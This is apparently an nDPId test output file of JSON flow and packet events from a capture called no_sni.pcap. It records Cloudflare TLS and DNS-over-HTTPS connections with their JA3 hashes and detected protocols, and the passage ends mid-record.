+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1604822444474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1604822444474,"pkt":"EBMxuRBeeDHBvV4kCABFAABPAABAAEAGFoDAqAF3aBD5+ciDAbvkc0fPNh\/971AYEABWfwAAFwMDACKpSo7n5l1NtXHPvYJ17DEID+iXo6vcSBPbb4QBvLt6N\/RR"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1604822444475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+ciDAbvkc0f2Nh\/971AYEAB\/fAAAFwMDABPsQXLhLYpNcnxO3uEm2chWzCNj"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1604822444475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+ciDAbvkc0gONh\/971AREABQ2gAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444486,"flow_last_seen":1604822444486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444486,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604822444486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444486,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+cmWAbsdU0ZpAAAAALAC\/\/\/IBQAAAgQFtAEDAwYBAQgKKlLxbAAAAAAEAgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604822444624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822444624,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGHZtoEPn5wKgBdwG7yZbnV+zfHVNGaoAS\/\/9HygAAAgQFeAEBBAIBAwMK"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604822444624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444624,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+cmWAbsdU0Zq51fs4FAQEAB4YwAA"} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444913,"flow_last_seen":1604822444913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444913,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1604822444913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444913,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGlCjAqAF3aBB8YMmcAbs\/DuN6AAAAALAC\/\/+FPgAAAgQFtAEDAwYBAQgKKlLy+gAAAAAEAgAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1604822445034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822445034,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGmzRoEHxgwKgBdwG7yZyEa\/jPPw7je4AS\/\/9djQAAAgQFeAEBBAIBAwMK"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1604822445034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822445034,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGlEDAqAF3aBB8YMmcAbs\/DuN7hGv40FAQEACOJgAA"} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447227,"flow_last_seen":1604822447227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447227,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1604822447227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447227,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcmzAbtjbUROAAAAALAC\/\/+t4gAAAgQFtAEDAwYBAQgKKlL7RgAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447249,"flow_last_seen":1604822447249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447249,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1604822447249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447249,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcm0AbsYxEgFAAAAALAC\/\/\/0wAAAAgQFtAEDAwYBAQgKKlL7WQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm1AbvwpFrxAAAAALAC\/\/+HSQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm2AbtLPosXAAAAALAC\/\/\/8iAAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447287,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822447287,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm3AbsAL2HpAAAAALAC\/\/9wxQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1604822447311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447311,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybNKGfaqY21ET4AS\/\/\/K9AAAAgQFeAEBBAIBAwMK"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1604822447311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447311,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcmzAbtjbURPShn2q1AQEAD7jQAA"} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1604822447325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447325,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybQgqbhsGMRIBoAS\/\/95lAAAAgQFeAEBBAIBAwMK"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1604822447325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447325,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcm0AbsYxEgGIKm4bVAQEACqLQAA"} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1604822447368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447368,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybVDiAdt8KRa8oAS\/\/+aXQAAAgQFeAEBBAIBAwMK"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1604822447369,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447369,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm1AbvwpFryQ4gHblAQEADK9gAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1604822447370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447370,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybbraGnySz6LGIAS\/\/8FNwAAAgQFeAEBBAIBAwMK"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1604822447370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447370,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm2AbtLPosY62hp81AQEAA10AAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1604822447373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822447373,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybcBQwC0AC9h6oAS\/\/\/M1wAAAgQFeAEBBAIBAwMK"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1604822447373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822447373,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm3AbsAL2HqAUMAtVAQEAD9cAAA"} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 